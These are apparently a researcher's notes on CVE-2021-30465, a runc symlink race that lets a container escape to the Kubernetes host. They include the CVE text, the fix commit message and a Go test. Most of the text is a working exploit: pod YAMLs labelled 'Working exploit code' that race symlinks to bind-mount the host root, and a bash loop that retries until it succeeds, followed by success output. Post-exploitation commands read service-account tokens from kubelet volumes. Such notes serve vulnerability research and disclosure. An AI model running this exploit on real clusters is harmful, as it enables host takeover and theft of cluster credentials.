func TestStripRoot(t *testing.T) {
	for _, test := range []struct {
		root, path, out string
	}{
		// Works with multiple components.
		{"/a/b", "/a/b/c", "/c"},
		{"/hello/world", "/hello/world/the/quick-brown/fox", "/the/quick-brown/fox"},
		// '/' must be a no-op.
		{"/", "/a/b/c", "/a/b/c"},
		// Must be the correct order.
		{"/a/b", "/a/c/b", "/a/c/b"},
		// Must be at start.
		{"/abc/def", "/foo/abc/def/bar", "/foo/abc/def/bar"},
		// Must be a lexical parent.
		{"/foo/bar", "/foo/barSAMECOMPONENT", "/foo/barSAMECOMPONENT"},
		// Must only strip the root once.
		{"/foo/bar", "/foo/bar/foo/bar/baz", "/foo/bar/baz"},
		// Deal with .. in a fairly sane way.
		{"/foo/bar", "/foo/bar/../baz", "/foo/baz"},
		{"/foo/bar", "../../../../../../foo/bar/baz", "/baz"},
		{"/foo/bar", "/../../../../../../foo/bar/baz", "/baz"},
		{"/foo/bar/../baz", "/foo/baz/bar", "/bar"},
		{"/foo/bar/../baz", "/foo/baz/../bar/../baz/./foo", "/foo"},
		// All paths are made absolute before stripping.
		{"foo/bar", "/foo/bar/baz/bee", "/baz/bee"},
		{"/foo/bar", "foo/bar/baz/beef", "/baz/beef"},
		{"foo/bar", "foo/bar/baz/beets", "/baz/beets"},
	} {
		got := stripRoot(test.root, test.path)
		if got != test.out {
			t.Errorf("stripRoot(%q, %q) -- got %q, expected %q", test.root, test.path, got, test.out)
		}
	}
}
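The test table above pins down what stripRoot has to do, so a function satisfying it can be sketched. The version below is a minimal sketch written only from those test cases; it uses the standard library's filepath.Clean and is not claimed to be runc's actual implementation, which may differ in detail.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// stripRoot returns path with the lexical prefix root removed.
// Both arguments are made absolute and cleaned first, so ".." components
// are collapsed before any comparison happens.
func stripRoot(root, path string) string {
	root = filepath.Clean("/" + root)
	path = filepath.Clean("/" + path)
	switch {
	case path == root:
		path = "/"
	case root == "/":
		// Stripping "/" is a no-op.
	case strings.HasPrefix(path, root+"/"):
		// The trailing "/" makes sure root is a whole-component parent,
		// and TrimPrefix removes it only once.
		path = strings.TrimPrefix(path, root+"/")
	}
	return filepath.Clean("/" + path)
}

func main() {
	fmt.Println(stripRoot("/foo/bar", "/foo/bar/../baz"))
	fmt.Println(stripRoot("foo/bar", "foo/bar/baz/beets"))
}
```

Note that this is a purely lexical operation: it never touches the filesystem, so it says nothing about symlinks, which is exactly the gap the rest of these notes are about.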
Text from the CVE:
However, it turns out with some container orchestrators (such as Kubernetes --
though it is very likely that other downstream users of runc could have similar
behaviour be accessible to untrusted users), the existence of additional volume
management infrastructure allows this attack to be applied to gain access to
the host filesystem without requiring the attacker to have completely arbitrary
control over container configuration.
In the case of Kubernetes, this is exploitable by creating a symlink in a
volume to the top-level (well-known) directory where volumes are sourced from
(for instance,
`/var/lib/kubelet/pods/$MY_POD_UID/volumes/`), and then
using that symlink as the target of a mount. The source of the mount is an
attacker controlled directory, and thus the source directory from which
subsequent mounts will occur is an attacker-controlled directory. Thus the
attacker can first place a symlink to `/` in their malicious source directory
with the name of a volume, and a subsequent mount in the container will
bind-mount `/` into the container.
Applying this attack requires the attacker to start containers with a slightly
peculiar volume configuration (though not explicitly malicious-looking such as
bind-mounting `/` into the container explicitly), and be able to run malicious
code in a container that shares volumes with said volume configuration. It
helps the attacker if the host paths used for volume management are well known,
though this is not a hard requirement.
Text from commit
rootfs: add mount destination validation
Because the target of a mount is inside a container (which may be a
volume that is shared with another container), there exists a race
condition where the target of the mount may change to a path containing
a symlink after we have sanitised the path -- resulting in us
inadvertently mounting the path outside of the container.
This is not immediately useful because we are in a mount namespace with
MS_SLAVE mount propagation applied to "/", so we cannot mount on top of
host paths in the host namespace. However, if any subsequent mountpoints
in the configuration use a subdirectory of that host path as a source,
those subsequent mounts will use an attacker-controlled source path
(resolved within the host rootfs) -- allowing the bind-mounting of "/"
into the container.
While arguably configuration issues like this are not entirely within
runc's threat model, within the context of Kubernetes (and possibly
other container managers that provide semi-arbitrary container creation
privileges to untrusted users) this is a legitimate issue. Since we
cannot block mounting from the host into the container, we need to block
the first stage of this attack (mounting onto a path outside the
container).
The long-term plan to solve this would be to migrate to libpathrs, but
as a stop-gap we implement libpathrs-like path verification through
readlink(/proc/self/fd/$n) and then do mount operations through the
procfd once it's been verified to be inside the container. The target
could move after we've checked it, but if it is inside the container
then we can assume that it is safe for the same reason that libpathrs
operations would be safe.
A slight wrinkle is the "copyup" functionality we provide for tmpfs,
which is the only case where we want to do a mount on the host
filesystem. To facilitate this, I split out the copy-up functionality
entirely so that the logic isn't interspersed with the regular tmpfs
logic. In addition, all dependencies on m.Destination being overwritten
have been removed since that pattern was just begging to be a source of
more mount-target bugs (we do still have to modify m.Destination for
tmpfs-copyup but we only do it temporarily).
Fixes: CVE-2021-30465
Reported-by: Etienne Champetier <>
Co-authored-by: Noah Meyerhans <>
Reviewed-by: Samuel Karp <>
Reviewed-by: Kir Kolyshkin <> (@kolyshkin)
Reviewed-by: Akihiro Suda <>
Signed-off-by: Aleksa Sarai <>
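The stop-gap described in the commit message (open the target, then check readlink(/proc/self/fd/$n) before mounting) can be illustrated with a small sketch. This is not runc's code: the helper names isInside and verifyOpened are hypothetical, the demo root is a temporary directory, and the real fix goes on to perform the mount through the /proc/self/fd path, which is omitted here. It assumes Linux with /proc mounted.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// isInside reports whether resolved is root itself or lies lexically beneath it.
func isInside(root, resolved string) bool {
	root, resolved = filepath.Clean(root), filepath.Clean(resolved)
	if root == "/" {
		return true
	}
	return resolved == root || strings.HasPrefix(resolved, root+"/")
}

// verifyOpened asks the kernel (via /proc/self/fd) which path the already
// opened file refers to and rejects it if that path is outside root.
func verifyOpened(root string, f *os.File) (string, error) {
	actual, err := os.Readlink(fmt.Sprintf("/proc/self/fd/%d", f.Fd()))
	if err != nil {
		return "", err
	}
	if !isInside(root, actual) {
		return "", fmt.Errorf("%q resolves outside root %q", actual, root)
	}
	return actual, nil
}

func main() {
	// Hypothetical container root, used only for this demonstration.
	tmp, err := os.MkdirTemp("", "rootfs")
	if err != nil {
		fmt.Println("setup failed:", err)
		return
	}
	defer os.RemoveAll(tmp)
	root, err := filepath.EvalSymlinks(tmp)
	if err != nil {
		fmt.Println("setup failed:", err)
		return
	}
	// A symlink pointing out of the root, as an attacker would plant it.
	if err := os.Symlink("/", filepath.Join(root, "escape")); err != nil {
		fmt.Println("setup failed:", err)
		return
	}
	f, err := os.Open(filepath.Join(root, "escape")) // follows the symlink
	if err != nil {
		fmt.Println("open failed:", err)
		return
	}
	defer f.Close()
	_, err = verifyOpened(root, f)
	fmt.Println("verification result:", err)
}
```

The point of checking the file descriptor rather than the path string is that the descriptor cannot be swapped underneath us: whatever the attacker does to the path afterwards, the descriptor still refers to the object that was verified.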
Dev Setup is a kind cluster
$▶ kind version
kind v0.11.0 go1.16.3 darwin/amd64
$▶ docker exec -ti kind-control-plane bash
root@kind-control-plane:/# runc --version
runc version 1.0.0-rc94
commit: 2c7861bc5e1b3e756392236553ec14a78a09f8bf
spec: 1.0.2-dev
go: go1.16.4
libseccomp: 2.5.1
Second dev setup
$ kind version
kind v0.8.1 go1.14.2 darwin/amd64
$ docker exec -ti kind-control-plane bash
root@kind-control-plane:/# runc --version
runc version 1.0.0-rc10
spec: 1.0.1-dev
This requires two different deployments that each target the same "mount point".
The first deployment mounts the volume and creates a symlink at a well-defined place in the node's filesystem.
The second deployment mounts the same volume and follows the symlink out to the host.
This is a single pod spec with multiple volumes, much like the subPath exploit but with different symlink targets: one that satisfies the "inside the container" check but has something else going for it that lets the second mount follow it back.
Learn the underlying host path for the shared volume:
grep empty /proc/1/task/1/mountinfo
1427 1406 254:1 /docker/volumes/d398781f9ae3253091092b07ff6e2875f7a67102c942996f7393ea1869a1df6d/_data/lib/kubelet/pods/5eb56535-4c29-4ccf-95a8-ac595b8c1b96/volumes/ /rootfs rw,relatime - ext4 /dev/vda1 rw
1428 1406 254:1 /docker/volumes/d398781f9ae3253091092b07ff6e2875f7a67102c942996f7393ea1869a1df6d/_data/lib/kubelet/pods/5eb56535-4c29-4ccf-95a8-ac595b8c1b96/volumes/ /status rw,relatime - ext4 /dev/vda1 rw
pushed a symlink example container here: mauilion/symlinks:push
My exploit uses:
1) multiple containers
2) empty dir volumes / tmpfs (but some other types are likely usable)
3) mount into mounts, ie
- name: test1
mountPath: /test1
- name: test2
mountPath: /test1/mnt2
If you can forbid mount into mounts you prevent this attack
Don't hesitate to ping me in public issue if needed
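The "forbid mount into mounts" mitigation mentioned above can be sketched as a lexical check over a container's mountPath values. This is only an illustration: nestedMounts is a hypothetical helper, and wiring it into an admission controller or policy engine is left out entirely.

```go
package main

import (
	"fmt"
	"path/filepath"
	"sort"
	"strings"
)

// nestedMounts returns every (parent, child) pair in which one mount path
// lies lexically beneath another mount path of the same container.
func nestedMounts(paths []string) [][2]string {
	cleaned := make([]string, 0, len(paths))
	for _, p := range paths {
		cleaned = append(cleaned, filepath.Clean("/"+p))
	}
	// After sorting, a parent always appears before its children.
	sort.Strings(cleaned)

	var pairs [][2]string
	for i, parent := range cleaned {
		prefix := parent + "/"
		if parent == "/" {
			prefix = "/"
		}
		for _, child := range cleaned[i+1:] {
			if child != parent && strings.HasPrefix(child, prefix) {
				pairs = append(pairs, [2]string{parent, child})
			}
		}
	}
	return pairs
}

func main() {
	// The volumeMounts from the snippet above.
	for _, pair := range nestedMounts([]string{"/test1", "/test1/mnt2"}) {
		fmt.Printf("mount %s is nested inside mount %s\n", pair[1], pair[0])
	}
}
```

A policy built on this would reject any pod for which the function returns a non-empty result. It is deliberately stricter than necessary, since nested mounts are also used legitimately.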
apiVersion: v1
kind: Pod
metadata:
  name: honk
spec:
  containers:
  - image: nginx:stable
    name: prehonk
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-xc", "cd /mnt1 && ln -s / mnt2 "]
    volumeMounts:
    - mountPath: /mnt1
      name: test1
  - image: nginx:stable
    name: exploit
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-c", "sleep infinity"]
    volumeMounts:
    - mountPath: /test1/mnt2
      name: test2
    - mountPath: /test1
      name: test1
  volumes:
  - name: test1
    emptyDir: {}
  - name: test2
    emptyDir: {}
apiVersion: v1
kind: Pod
metadata:
  name: honk
spec:
  containers:
  - image: nginx:stable
    name: prehonk
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-xc", "mkdir -p $(grep rootfs /proc/1/task/1/mountinfo | awk '{print $4}' | sed s/escape-volume//) && cd /rootfs && ln -s / $(grep rootfs /proc/1/task/1/mountinfo | awk '{print $4}' | sed s/escape/status/)"]
    volumeMounts:
    - mountPath: /rootfs
      name: escape-volume
  - image: nginx:stable
    name: exploitj
    imagePullPolicy: "IfNotPresent"
    command: ["/bin/bash"]
    args: ["-c", "sleep infinity"]
    volumeMounts:
    - mountPath: /rootfs/status
      name: escape-volume
  volumes:
  - name: escape-volume
    emptyDir: {}
  - name: status-volume
    emptyDir: {}
Trick to grab logs for a failed pod on the host:
this finds the recently exited prehonk container and prints its logs.
root@kind-control-plane:/> crictl logs $(crictl ps -a | grep prehonk | awk '{print $1}')
+ cd /mnt1
+ ln -s / mnt2
ln: failed to create symbolic link 'mnt2/': File exists
Working exploit code:
# honk-pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: honk
spec:
  #runAsUser: 1000
  #runAsGroup: 1000
  containers:
  - image: nginx:latest
    imagePullPolicy: IfNotPresent
    name: 0-link0
    command: ["/bin/bash"]
    args: ["-xc", "cd /honk; while true; do rm -rf host; ln -s / host; done;"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
  - image: nginx:latest
    imagePullPolicy: Always
    name: 1-honk
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
    - mountPath: /honk/host
      name: host-volume
  - image: nginx:latest
    imagePullPolicy: Always
    name: 2-honk
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
    - mountPath: /honk/host
      name: host-volume
  - image: nginx:latest
    imagePullPolicy: Always
    name: 3-honk
    command: ["sleep", "infinity"]
    volumeMounts:
    - mountPath: /honk
      name: escape-volume
    - mountPath: /honk/host
      name: host-volume
  volumes:
  - name: escape-volume
    emptyDir: {}
  - name: host-volume
    emptyDir: {}
#!/usr/bin/env bash
# The initial values of RUNS and COUNTER are assumed; they are missing from these notes.
RUNS=1
while [ $RUNS -lt 100 ]; do
  kubectl delete -f honk-pod.yaml --grace-period=0 --force 2> /dev/null
  sleep 3
  kubectl apply -f honk-pod.yaml
  kubectl wait -f honk-pod.yaml --for condition=Ready --timeout=30s 2> /dev/null
  COUNTER=1
  while [ $COUNTER -lt 4 ]; do
    echo -n "Checking $COUNTER-honk for the host mount..."
    # count the pid directories on the host if there are more than 5
    # we have a success.
    if [[ "$(kubectl exec -it honk -c $COUNTER-honk -- find /proc -maxdepth 1 ! -name '*[!0-9]*' 2>/dev/null | wc -l)" -gt 5 ]]; then
    #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- /home/kubernetes/bin/crictl ps 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
    # Kind
    #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- runc list 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
    # Civo/k3s
    #if [ "$(kubectl exec -it honk -c $COUNTER-honk -- k3s -v 2> /dev/null | wc -l | awk '{print $1}')" -ne '0' ]; then
      echo "SUCCESS after $RUNS runs!"
      echo "Run kubectl exec -it honk -c $COUNTER-honk -- bash"
      exit 0
    else
      echo "nope."
    fi
    let COUNTER=$COUNTER+1
  done
  let RUNS=$RUNS+1
done
$ ./
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...nope.
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...nope.
pod "honk" force deleted
pod/honk created
pod/honk condition met
Checking 1-honk for the host mount...nope.
Checking 2-honk for the host mount...nope.
Checking 3-honk for the host mount...SUCCESS after 22 runs!
Run kubectl exec -it honk -c 3-honk -- bash
By seeing /run/runc in the exploit container, we know we have a host path mount working, because that path only exists on the underlying node and not inside our nginx container. This may vary per target, but it's easy enough to adjust if needed.
$ kubectl exec -it exploit -c 3-honk -- bash
root@honk:/# ls
bin boot dev etc home kind lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var
$ kubectl exec -it exploit -c 3-honk -- crictl ps
f354220ae48d3 f0b8a9a541369 8 minutes ago Running 3-honk 2 d6cfcd0c10c43
847a2f406e30f f0b8a9a541369 8 minutes ago Running 2-honk 0 d6cfcd0c10c43
7d6994acef655 f0b8a9a541369 8 minutes ago Running 1-honk 0 d6cfcd0c10c43
36ac6b9ef00d0 f0b8a9a541369 8 minutes ago Running 0-link 0 d6cfcd0c10c43
c672feb53eaa9 e422121c9c5f9 18 hours ago Running local-path-provisioner 0 aedc00f117150
8a3fea897c809 bfe3a36ebd252 18 hours ago Running coredns 0 cbda6967dd1f7
afe11ac87a75e bfe3a36ebd252 18 hours ago Running coredns 0 6f26d4dcd0e2e
79d5da0a84ef1 6b17089e24fdb 18 hours ago Running kindnet-cni 0 8539b3556a14b
e9b44cb76c812 23b52beab6e55 18 hours ago Running kube-proxy 0 815a6a9064842
c80612e8c9e52 0369cf4303ffd 18 hours ago Running etcd 0 0563e084fe6ee
09ef10a38b9e8 51dc9758caa7b 18 hours ago Running kube-controller-manager 0 c566b807c748b
d0f8fb646cd32 3ad0575b6f104 18 hours ago Running kube-apiserver 0 327abdbfe5320
396e975f0500a cd40419687469 18 hours ago Running kube-scheduler 0 950216aec91d8
root@honk:/# amicontained
Container Runtime: docker
Has Namespaces:
pid: true
user: false
AppArmor Profile: unconfined
BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap
Seccomp: disabled
Blocked Syscalls (20):
Looking for Docker.sock
# find -L /var/lib/kubelet/pods/*/volumes/*/token -print -exec cat {} \; | sed -e 's/\/var/\r\n\/var/g';
Inspect an exploited container from the host
# crictl inspect e1e8927a546a6
"status": {
"id": "e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220",
"metadata": {
"attempt": 0,
"name": "2-exploit"
"createdAt": "2021-05-21T00:52:20.8831732Z",
"startedAt": "2021-05-21T00:52:21.0110818Z",
"finishedAt": "1970-01-01T00:00:00Z",
"exitCode": 0,
"image": {
"annotations": {},
"image": ""
"imageRef": "",
"reason": "",
"message": "",
"labels": {
"": "2-exploit",
"": "exploit",
"io.kubernetes.pod.namespace": "default",
"io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
"annotations": {
"io.kubernetes.container.hash": "b5a5fa",
"io.kubernetes.container.restartCount": "0",
"io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
"io.kubernetes.container.terminationMessagePolicy": "File",
"io.kubernetes.pod.terminationGracePeriod": "30"
"mounts": [
"containerPath": "/rootfs",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"containerPath": "/rootfs/host",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"containerPath": "/var/run/secrets/",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"propagation": "PROPAGATION_PRIVATE",
"readonly": true,
"selinuxRelabel": false
"containerPath": "/etc/hosts",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"containerPath": "/dev/termination-log",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"logPath": "/var/log/pods/default_exploit_72c63ff5-05fd-465d-81c0-8bcfdd58edb3/2-exploit/0.log"
"info": {
"sandboxID": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8",
"pid": 2894296,
"removing": false,
"snapshotKey": "e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220",
"snapshotter": "overlayfs",
"runtimeType": "io.containerd.runc.v2",
"runtimeOptions": null,
"config": {
"metadata": {
"name": "2-exploit"
"image": {
"image": "sha256:f0b8a9a541369db503ff3b9d4fa6de561b300f7363920c2bff4577c6c24c5cf6"
"command": [
"envs": [
"value": ""
"value": ""
"value": "443"
"value": "443"
"value": "tcp://"
"value": "tcp://"
"value": "tcp"
"value": "443"
"mounts": [
"container_path": "/rootfs",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/"
"container_path": "/rootfs/host",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/"
"container_path": "/var/run/secrets/",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"readonly": true
"container_path": "/etc/hosts",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts"
"container_path": "/dev/termination-log",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a"
"labels": {
"": "2-exploit",
"": "exploit",
"io.kubernetes.pod.namespace": "default",
"io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
"annotations": {
"io.kubernetes.container.hash": "b5a5fa",
"io.kubernetes.container.restartCount": "0",
"io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
"io.kubernetes.container.terminationMessagePolicy": "File",
"io.kubernetes.pod.terminationGracePeriod": "30"
"log_path": "2-exploit/0.log",
"linux": {
"resources": {
"cpu_period": 100000,
"cpu_shares": 2,
"oom_score_adj": 1000,
"hugepage_limits": [
"page_size": "1GB"
"page_size": "2MB"
"security_context": {
"namespace_options": {
"pid": 1
"run_as_user": {},
"masked_paths": [
"readonly_paths": [
"runtimeSpec": {
"ociVersion": "1.0.2-dev",
"process": {
"user": {
"uid": 0,
"gid": 0
"args": [
"env": [
"cwd": "/",
"capabilities": {
"bounding": [
"effective": [
"inheritable": [
"permitted": [
"oomScoreAdj": 1000
"root": {
"path": "rootfs"
"mounts": [
"destination": "/proc",
"type": "proc",
"source": "proc",
"options": [
"destination": "/dev",
"type": "tmpfs",
"source": "tmpfs",
"options": [
"destination": "/dev/pts",
"type": "devpts",
"source": "devpts",
"options": [
"destination": "/dev/mqueue",
"type": "mqueue",
"source": "mqueue",
"options": [
"destination": "/sys",
"type": "sysfs",
"source": "sysfs",
"options": [
"destination": "/sys/fs/cgroup",
"type": "cgroup",
"source": "cgroup",
"options": [
"destination": "/rootfs",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"options": [
"destination": "/rootfs/host",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"options": [
"destination": "/etc/hosts",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
"options": [
"destination": "/dev/termination-log",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/2-exploit/6770f37a",
"options": [
"destination": "/etc/hostname",
"type": "bind",
"source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/hostname",
"options": [
"destination": "/etc/resolv.conf",
"type": "bind",
"source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/resolv.conf",
"options": [
"destination": "/dev/shm",
"type": "bind",
"source": "/run/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/shm",
"options": [
"destination": "/var/run/secrets/",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"options": [
"annotations": {
"io.kubernetes.cri.container-name": "2-exploit",
"io.kubernetes.cri.container-type": "container",
"io.kubernetes.cri.sandbox-id": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8"
"linux": {
"resources": {
"devices": [
"allow": false,
"access": "rwm"
"memory": {},
"cpu": {
"shares": 2,
"period": 100000
"cgroupsPath": "/kubelet/kubepods/besteffort/pod72c63ff5-05fd-465d-81c0-8bcfdd58edb3/e1e8927a546a60ec3f5e4dc1fe25a756b2a1f48080d9a1db34fd32ed94d89220",
"namespaces": [
"type": "pid"
"type": "ipc",
"path": "/proc/2893298/ns/ipc"
"type": "uts",
"path": "/proc/2893298/ns/uts"
"type": "mount"
"type": "network",
"path": "/proc/2893298/ns/net"
"maskedPaths": [
"readonlyPaths": [
Inspect a non-exploited container
# crictl inspect addfd289b2769
"status": {
"id": "addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060",
"metadata": {
"attempt": 0,
"name": "1-exploit"
"createdAt": "2021-05-21T00:52:20.4450061Z",
"startedAt": "2021-05-21T00:52:20.6401701Z",
"finishedAt": "1970-01-01T00:00:00Z",
"exitCode": 0,
"image": {
"annotations": {},
"image": ""
"imageRef": "",
"reason": "",
"message": "",
"labels": {
"": "1-exploit",
"": "exploit",
"io.kubernetes.pod.namespace": "default",
"io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
"annotations": {
"io.kubernetes.container.hash": "7a407414",
"io.kubernetes.container.restartCount": "0",
"io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
"io.kubernetes.container.terminationMessagePolicy": "File",
"io.kubernetes.pod.terminationGracePeriod": "30"
"mounts": [
"containerPath": "/rootfs",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"containerPath": "/rootfs/host",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"containerPath": "/var/run/secrets/",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"propagation": "PROPAGATION_PRIVATE",
"readonly": true,
"selinuxRelabel": false
"containerPath": "/etc/hosts",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"containerPath": "/dev/termination-log",
"hostPath": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf",
"propagation": "PROPAGATION_PRIVATE",
"readonly": false,
"selinuxRelabel": false
"logPath": "/var/log/pods/default_exploit_72c63ff5-05fd-465d-81c0-8bcfdd58edb3/1-exploit/0.log"
"info": {
"sandboxID": "f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8",
"pid": 2893952,
"removing": false,
"snapshotKey": "addfd289b276936bb59fd81bedd5693d9bb5f486f19574cd392f621e9d2d5060",
"snapshotter": "overlayfs",
"runtimeType": "io.containerd.runc.v2",
"runtimeOptions": null,
"config": {
"metadata": {
"name": "1-exploit"
"image": {
"image": "sha256:f0b8a9a541369db503ff3b9d4fa6de561b300f7363920c2bff4577c6c24c5cf6"
"command": [
"envs": [
"value": ""
"value": ""
"value": "443"
"value": "443"
"value": "tcp://"
"value": "tcp://"
"value": "tcp"
"value": "443"
"mounts": [
"container_path": "/rootfs",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/"
"container_path": "/rootfs/host",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/"
"container_path": "/var/run/secrets/",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"readonly": true
"container_path": "/etc/hosts",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts"
"container_path": "/dev/termination-log",
"host_path": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf"
"labels": {
"": "1-exploit",
"": "exploit",
"io.kubernetes.pod.namespace": "default",
"io.kubernetes.pod.uid": "72c63ff5-05fd-465d-81c0-8bcfdd58edb3"
"annotations": {
"io.kubernetes.container.hash": "7a407414",
"io.kubernetes.container.restartCount": "0",
"io.kubernetes.container.terminationMessagePath": "/dev/termination-log",
"io.kubernetes.container.terminationMessagePolicy": "File",
"io.kubernetes.pod.terminationGracePeriod": "30"
"log_path": "1-exploit/0.log",
"linux": {
"resources": {
"cpu_period": 100000,
"cpu_shares": 2,
"oom_score_adj": 1000,
"hugepage_limits": [
"page_size": "1GB"
"page_size": "2MB"
"security_context": {
"namespace_options": {
"pid": 1
"run_as_user": {},
"masked_paths": [
"readonly_paths": [
"runtimeSpec": {
"ociVersion": "1.0.2-dev",
"process": {
"user": {
"uid": 0,
"gid": 0
"args": [
"env": [
"cwd": "/",
"capabilities": {
"bounding": [
"effective": [
"inheritable": [
"permitted": [
"oomScoreAdj": 1000
"root": {
"path": "rootfs"
"mounts": [
"destination": "/proc",
"type": "proc",
"source": "proc",
"options": [
"destination": "/dev",
"type": "tmpfs",
"source": "tmpfs",
"options": [
"destination": "/dev/pts",
"type": "devpts",
"source": "devpts",
"options": [
"destination": "/dev/mqueue",
"type": "mqueue",
"source": "mqueue",
"options": [
"destination": "/sys",
"type": "sysfs",
"source": "sysfs",
"options": [
"destination": "/sys/fs/cgroup",
"type": "cgroup",
"source": "cgroup",
"options": [
"destination": "/rootfs",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"options": [
"destination": "/rootfs/host",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/volumes/",
"options": [
"destination": "/etc/hosts",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/etc-hosts",
"options": [
"destination": "/dev/termination-log",
"type": "bind",
"source": "/var/lib/kubelet/pods/72c63ff5-05fd-465d-81c0-8bcfdd58edb3/containers/1-exploit/c562dfbf",
"options": [
"destination": "/etc/hostname",
"type": "bind",
"source": "/var/lib/containerd/io.containerd.grpc.v1.cri/sandboxes/f488b53f4c0b3a86785c714871a622e016e51974b4984f16e1c2883e3bb7dcf8/hostname",
"options": [
"destination": "/etc/resolv.conf",
